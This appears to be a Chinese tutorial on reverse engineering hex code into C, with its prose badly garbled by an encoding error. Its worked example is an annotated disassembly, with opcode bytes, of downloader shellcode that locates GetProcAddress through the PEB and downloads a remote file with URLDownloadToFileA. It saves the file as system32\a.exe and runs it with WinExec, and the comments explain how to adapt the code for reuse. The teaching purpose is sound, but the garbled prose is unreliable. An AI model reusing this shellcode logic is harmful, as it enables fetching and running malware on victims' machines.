æ件æ两ç§ï¼ä¸ç§æ¯ææ¬æ件ï¼ä¸ç§æ¯ç¨åºäºè¿å¶æ件ï¼ä¸ç®¡åªç§æ件é½å¯ä»¥ç¨åå
è¿å¶ç¼ç æ¥æ¾ç¤ºï¼ç§°ä¸ºhexæ件ã
1ãææ¬Hexæ件ä¸è¬ä¸éè¦è½¬æCè¯è¨ï¼æ´å¤çæ¯ç¨åºäºè¿å¶æ件ï¼ç¨åå
è¿å¶æ¾ç¤ºï¼å¯ä»¥è½¬æ¢æCè¯è¨ï¼ä¸è¬ä½¿ç¨ç¸åºçåæ±ç¼ç¨åºæ¥å®ç°ï¼è¿æ¹é¢çå·¥å
·å¾å¤ï¼ä¸åçå¹³å°ç¥æä¸åãWindowså¹³å°ä¸è¬å¸¸ç¨çOllyDbgãWindbgãIDAï¼Linuxå¹³å°ä½¿ç¨æå¤çæ¯GDBåLinuxççIDAã
OllyDbgï¼ç®ç§°OD,ä¸è¬æ¯è½¯ä»¶éåå·¥ç¨ç±å¥½è
ï¼æå
使ç¨çä¸ä¸ªå·¥å
·ï¼ä½æ¯å 为å½ä¸ä¸å¨æ´æ°ï¼æ以ä¸è¬ç¨ä¸è¬ç¨äºå¦ä¹ 使ç¨ï¼ä¸å¾ä¸å·¦ä¸è§çåºåå³ä¸ºåæ±ç¼åºå ï¼ç¨æ·å¯ä»¥æ ¹æ®æ±ç¼æ令ï¼åæç¨åºç®æ³ï¼ç¶åèªå·±ç¼å代ç ã
å¨Windowså¹³å°ï¼ç¹å«æ¯x64å¹³å°ï¼æ好ç¨çåæ±ç¼å·¥å
·é¤è¿å¾æ¯Windbgãå°ç¨åºè½½å
¥Windbgåï¼å¯ä»¥è¾å
¥uå½ä»¤æ¥æ¥çç¨åºçåæ±ç¼ä»£ç ã
2ã对äºç¼ç¨äººåæ¥è¯´ï¼éååææ¯ä¸ä¸ªåºæ¬çæè½ï¼ä½æ¯å¾å¾ä¸å®¹æå
¥é¨ï¼è¿é举ä¸ä¸ªä¾åã以ä¸æ®µæ©äºå¹´ShellCodeçåå
è¿å¶ä»£ç 为ä¾ï¼ä»£ç å¦ä¸å¾æ示ï¼è¿æ®µä¸èµ·ç¼ç代ç ï¼å®é
ä¸å®ç°äºä¸ä¸ªä¸è½½è
çåè½ã
æ¿å°è¿æ ·çåå
è¿å¶ä»£ç ï¼ä¸è¬æ¥è¯´ï¼å
å°å
¶çæäºè¿å¶æ件ï¼ç¶åååæå
¶æ令ï¼éè¿åæ±ç¼æ令åååºæºç ãåªéè¦å°ä¸é¢çåå
è¿å¶ä»£ç ï¼ä¿åå°Cè¯è¨çå符串æ°ç»ä¸ï¼åå
¥å°ä¸ä¸ªExeçæ件空段ä¸ï¼åä¿®æ¹æ令å°å
¶è·³è½¬å°ç¨åºå
¥å£å¤å³å¯ï¼è¿ä¸ªè¿ç¨ç±»ä¼¼äºè½¯ä»¶å®å
¨é¢åç壳ã
å°åå
è¿å¶ä»£ç åå
¥ä¸ä¸ªexeæ件åï¼å°±å¯ä»¥å°exeæ件载å
¥å¨æè°è¯å¨è¿è¡å¨æåææè
使ç¨éæåæ±ç¼ç¨åºè¿è¡éæåæï¼ä¸¤è
çä¸åå¨äºå¨æè°è¯å¨æ¯è¦è¿è¡ç¨åºçï¼èéæåæ±ç¼åæä¸éè¦è¿è¡ç¨åºï¼æ以ä¸è¬æ¶æç¨åºï¼é½éç¨éæåæãåæ±ç¼å¼å¤´çä¸æ®µåå
è¿å¶ä»£ç 注éå¦ä¸ï¼
4AD75021 5A pop edx ; å½æ°è¿åçå°åä¿åå°edxä¸
4AD75022 64:A1 30000000 mov eax, dword ptr fs:[30] ; åpeb
4AD75028 8B40 0C mov eax, dword ptr [eax+C] ; peb_link
4AD7502B 8B70 1C mov esi, dword ptr [eax+1C] ; åå§åå表å°esi
4AD7502E AD lods dword ptr [esi] ; [esi]->eax + 8çä½ç½®å³kernel32.dllçå°å
4AD7502F 8B40 08 mov eax, dword ptr [eax+8] ; eax=kernel32.dllçå°å
4AD75032 8BD8 mov ebx, eax ; ebx=kernel32.dllçåºå
4AD75034 8B73 3C mov esi, dword ptr [ebx+3C] ; esi = pe头å移
4AD75037 8B741E 78 mov esi, dword ptr [esi+ebx+78] ; esi为kernel32.dll导åºè¡¨çå移
4AD7503B 03F3 add esi, ebx ; esi = kernel32.dll导åºè¡¨çèæå°å
4AD7503D 8B7E 20 mov edi, dword ptr [esi+20] ; edi=entçå移å°å
4AD75040 03FB add edi, ebx ; edi = entçèæå°å
4AD75042 8B4E 14 mov ecx, dword ptr [esi+14] ; ecx = kernel32.dll导åºå°åç个æ°
4AD75045 33ED xor ebp, ebp ; ebp=0
4AD75047 56 push esi ; ä¿å导åºè¡¨èæå°å
4AD75048 57 push edi ; ä¿åentèæå°å
4AD75049 51 push ecx ; ä¿å计æ°
4AD7504A 8B3F mov edi, dword ptr [edi]
4AD7504C 03FB add edi, ebx ; å®ä½entä¸çå½æ°å
4AD7504E 8BF2 mov esi, edx ; esi为 è¦æ¥è¯¢çå½æ°GetProcAddresså³è¯¥callçä¸ä¸ä¸ªå°åæ¯æ°æ®
4AD75050 6A 0E push 0E ; 0xe0æ¯GetProcAddresså½æ°çå符个æ°
4AD75052 59 pop ecx ; 设置循ç¯æ¬¡æ°ä¸º 0xe
4AD75053 F3:A6 repe cmps byte ptr es:[edi], byte ptr [esi] ; ecx!=0&&zf=1 ecx=ecx-1 cmpså¤æ GetProcAddress
4AD75055 74 08 je short 4AD7505F ; å¦æENTä¸çå½æ°å为GetProcAddress跳走
4AD75057 59 pop ecx ; ä¸ç¸çåå°å¯¼åºå°åæ°åºæ
4AD75058 5F pop edi ; entèæå°ååºæ
4AD75059 83C7 04 add edi, 4 ; ediå°åéå¢4åè å 为ENTçå
ç´ å¤§å°ä¸º4åè
4AD7505C 45 inc ebp ; ebpç¨äºä¿åentä¸å®ä½å°GetProcAddresså½æ°æ¶ç计æ°
4AD7505D ^ E2 E9 loopd short 4AD75048 ; 循ç¯æ¥è¯¢
4AD7505F 59 pop ecx
4AD75060 5F pop edi
4AD75061 5E pop esi
4AD75062 8BCD mov ecx, ebp ; 计æ°ä¿åäºecx
4AD75064 8B46 24 mov eax, dword ptr [esi+24] ; esi+0x24 Ordinalåºå·è¡¨å移å°å
4AD75067 03C3 add eax, ebx ; ordinalåºå·è¡¨çèæå°å
4AD75069 D1E1 shl ecx, 1 ; ecxé»è¾å¢å 2å å 为ordinalåºå·æ¯WORç±»åä¸é¢æ¯éè¿add æ¥æ±ordinalæ以è¿éå¿
é¡»æ©å¤§2å
4AD7506B 03C1 add eax, ecx
4AD7506D 33C9 xor ecx, ecx ; ecx=0
4AD7506F 66:8B08 mov cx, word ptr [eax] ; ä¿åååºçordinalåºå·
4AD75072 8B46 1C mov eax, dword ptr [esi+1C] ; eax 为kenrnel32.dllçEATçå移å°å
4AD75075 > 03C3 add eax, ebx ; eax = kernel32.dllçeatèæå°å
4AD75077 C1E1 02 shl ecx, 2 ; åä¸ï¼æ©å¤§4åå 为eatä¸å
ç´ ä¸ºDWORDå¼
4AD7507A 03C1 add eax, ecx
4AD7507C 8B00 mov eax, dword ptr [eax] ; eaxå³ä¸ºGetProcAddresså½æ°çå°å ç¸å¯¹èæå°åï¼EATä¸ä¿åçRVA
4AD7507E 03C3 add eax, ebx ; ä¸åºåç¸å æ±å¾GetProcAddresså½æ°çèæå°å
4AD75080 8BFA mov edi, edx ; GetProcAddresså符å°edi
4AD75082 8BF7 mov esi, edi ; esiä¿åGetProcAddresså°å
4AD75084 83C6 0E add esi, 0E ; esiæåGetProcAddresså符串çæ«å°å
4AD75087 8BD0 mov edx, eax ; edx为GetProcAddressçå°å
4AD75089 6A 04 push 4
4AD7508B 59 pop ecx ; ecx=4
æç»éªçç¨åºåï¼ éè¿åæå³æç½ä¸é¢åæ±ç¼ä»£ç ç主è¦ç®çå°±æ¯è·åGetProcAddresså½æ°çå°åã继ç»çåæ±ç¼ä»£ç ï¼
4AD7508C E8 50000000 call 4AD750E1 ; 设置IAT å¾å°4个å½æ°çå°å
4AD75091 83C6 0D add esi, 0D ; ä»è¿éå¼å§å®ç°ShellCodeççæ£åè½
4AD75094 52 push edx
4AD75095 56 push esi ; urlmon
4AD75096 FF57 FC call dword ptr [edi-4] ; è°ç¨LoadLibrarAæ¥å è½½urlmon.dll
4AD75099 5A pop edx ; edx = GetProcAddressçå°å
4AD7509A 8BD8 mov ebx, eax
4AD7509C 6A 01 push 1
4AD7509E 59 pop ecx
4AD7509F E8 3D000000 call 4AD750E1 ; å次设置 IAT å¾å°URLDownLoadToFileA
4AD750A4 83C6 13 add esi, 13 ; esiæåURLDownLoadToFileAçæ«å°å
4AD750A7 56 push esi
4AD750A8 46 inc esi
4AD750A9 803E 80 cmp byte ptr [esi], 80 ; å¤æesiæ¯å¦ä¸º0x80 è¿éå¨åç ä¸æ0x80å¦æè¦èªå·±ç¨ï¼åºè¯¥å ä¸ä¸ä¸ªåèç¨äºè¡¨ç¤ºç¨åºç»æ
4AD750AC ^ 75 FA jnz short 4AD750A8 ; è·¨è¿è¿ä¸ªè·³è½¬ï¼éè¦å¨ODä¸CTRL+Eä¿®æ¹æ°æ®ä¸º0x80
4AD750AE 8036 80 xor byte ptr [esi], 80
4AD750B1 5E pop esi
4AD750B2 83EC 20 sub esp, 20 ; å¼è¾ 32 byteæ 空é´
4AD750B5 > 8BDC mov ebx, esp ; ebx为æ åºçæé
4AD750B7 6A 20 push 20
4AD750B9 53 push ebx
4AD750BA FF57 EC call dword ptr [edi-14] ; è°ç¨GetSystemDirectoryAå¾å°ç³»ç»ç®å½
4AD750BD C70403 5C612E65 mov dword ptr [ebx+eax], 652E615C ; ebx+0x13 ç³»ç»è·¯å¾å 0x13个åè
4AD750C4 C74403 04 78650000 mov dword ptr [ebx+eax+4], 6578 ; æ¼æ¥ä¸è½½åçæ件路å¾%systemroot%\system32\a.exe
4AD750CC 33C0 xor eax, eax
4AD750CE 50 push eax
4AD750CF 50 push eax
4AD750D0 53 push ebx
4AD750D1 56 push esi
4AD750D2 50 push eax
4AD750D3 > FF57 FC call dword ptr [edi-4] ; URLDownLoadToFileä¸è½½æ件为a.exe
4AD750D6 8BDC mov ebx, esp
4AD750D8 50 push eax
4AD750D9 53 push ebx
4AD750DA FF57 F0 call dword ptr [edi-10] ; WinExecæ§è¡ä»£ç
4AD750DD 50 push eax
4AD750DE FF57 F4 call dword ptr [edi-C] ; ExitThreadéåºçº¿ç¨
æ¥ä¸æ¥çæä½ä¾¿æ¯éè¿å·²è·å¾å°åçGetProcAddress()æ¥åå«å¾å°GetSystemDirectory()ãURLDownLoadToFile()ãWinExec()åExitProcess()å½æ°çå°åï¼å¹¶ä¾æ¬¡æ§è¡ãå°è¿éå®é
ä¸æç»éªçç¨åºåï¼é©¬ä¸å°±è½ååºCè¯è¨ä»£ç æ¥ã åé¢çæ°æ®åºä¸å¨åæäºï¼ä¸»è¦æ¯ä»ç»å¦ä½æä½ã
使ç¨Cè¯è¨ï¼è½ç¶ç¥éäºHexæ件ç大è´æµç¨ï¼ä½æ¯ä¸è¬æ¥è¯´ï¼å¯¹äºæ±ç¼æ令ï¼æ´å¾åäºç´æ¥ä½¿ç¨asmå
³é®åæ¥ä½¿ç¨å
èæ±ç¼ãå¦ä¸å¾æ示ï¼
éè¿è¿ä¸ªå®ä¾ ï¼ç¸ä¿¡åºè¯¥è½ç解ä¸ä¸ªå¤§è´çæµç¨å¦ã